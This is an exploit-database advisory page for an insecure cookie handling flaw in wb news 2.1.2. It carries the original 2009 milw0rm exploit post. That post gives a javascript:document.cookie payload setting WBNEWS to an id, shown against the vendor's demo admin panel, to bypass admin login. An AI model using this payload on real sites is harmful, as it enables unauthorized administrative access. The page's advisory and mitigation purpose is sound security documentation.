wb news 2.1.2 Insecure Cookie Handling Vulnerability

vendor:

wb news

by:

ThE g0bL!N

7,5

CVSS

HIGH

Insecure Cookie Handling

384

CWE

Product Name: wb news

Affected Version From: 2.1.2

Affected Version To: 2.1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:webmobo:wb_news:2.1.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

wb news 2.1.2 Insecure Cookie Handling Vulnerability

A vulnerability in wb news 2.1.2 allows an attacker to set an arbitrary cookie value by using the javascript:document.cookie="WBNEWS=[id];path=/" command. This can be used to gain access to the admin panel of the application.

Mitigation:

Ensure that cookies are set with the secure flag and that the application is configured to only accept cookies from trusted sources.

Source

Exploit-DB raw data:

[~] ----------------------------Ø¨Ø³Ù… Ø§Ù„Ù„Ù‡ Ø§Ù„Ø±ØÙ…Ù† Ø§Ù„Ø±ØÙŠÙ…-----------------------------
  
 [~]Download: http://www.webmobo.com/downloads/
  
 [~]Software: wb news 2.1.2
 [~]author: ThE g0bL!N
  
  
 [~] Home: WWW.h4ckf0ru.com
Chi3arona houa :  Serra7 merra7 , koulchi mderra7>>>>
             Aflawa Kamikaz Wa4rin Fi kol Bla4s
[~] -----------------------------{ Iam MuSlIm}------------------------------
  
wb news 2.1.2 Insecure Cookie Handling Vulnerability
---------------------------------------
exploit:
-------
javascript:document.cookie="WBNEWS=[id];path=/";
demo
----
http://demo.webmobo.com/news/admin/
exploit for demo
----------------
javascript:document.cookie="WBNEWS=1;path=/";
 
[~]--------------------------------------------------------------------------------
 
 [~] Greetz tO:
  [~]
  [~] Dos-Dz TeaM - Snakes TeaM - Team Sobh4n ALLAH -His0k4-
  [~]
  [~]
  [~]
  [~]
 
 [~]--------------------------------------------------------------------------------

# milw0rm.com [2009-04-20]